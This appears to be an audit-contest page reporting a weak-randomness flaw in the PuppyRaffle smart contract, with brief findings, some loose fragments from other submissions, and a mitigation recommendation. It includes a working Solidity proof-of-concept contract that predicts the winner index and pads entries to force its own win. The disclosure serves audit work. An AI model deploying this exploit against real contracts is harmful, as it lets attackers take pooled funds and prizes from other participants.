Root Cause: Randomness is derived from predictable on-chain values (msg.sender, block.timestamp, block.difficulty) that can be known or influenced before transaction execution.
Impact: Attackers can predict or manipulate the raffle outcome to guarantee they win and receive the rarest NFT, completely defeating the purpose of a fair raffle.
Normal Behavior: The selectWinner() function should randomly and fairly select a winner from all participants and assign a random rarity to the minted NFT.
Issue: The randomness is derived from predictable on-chain values (msg.sender, block.timestamp, block.difficulty). Miners can manipulate block.timestamp and block.difficulty, while any user can control msg.sender by using different addresses or contracts to call the function when the outcome is favorable.
Likelihood:HIGH
Reason 1 : Miners/validators have direct control over block.timestamp (within limits) and block.difficulty
Reason 2 :Users can deploy contracts at specific addresses to influence msg.sender
Impact:HIGH
Impact 1:Attacker can guarantee they receive a legendary (most rare) NFT
Impact 2: Attacker can guarantee they win the raffle
Only submit the selectWinner() transaction when they would win
Contract requests randomness with a unique request ID
## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.
The contest is live. Earn rewards by submitting a finding.
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsThe contest is complete and the rewards are being distributed.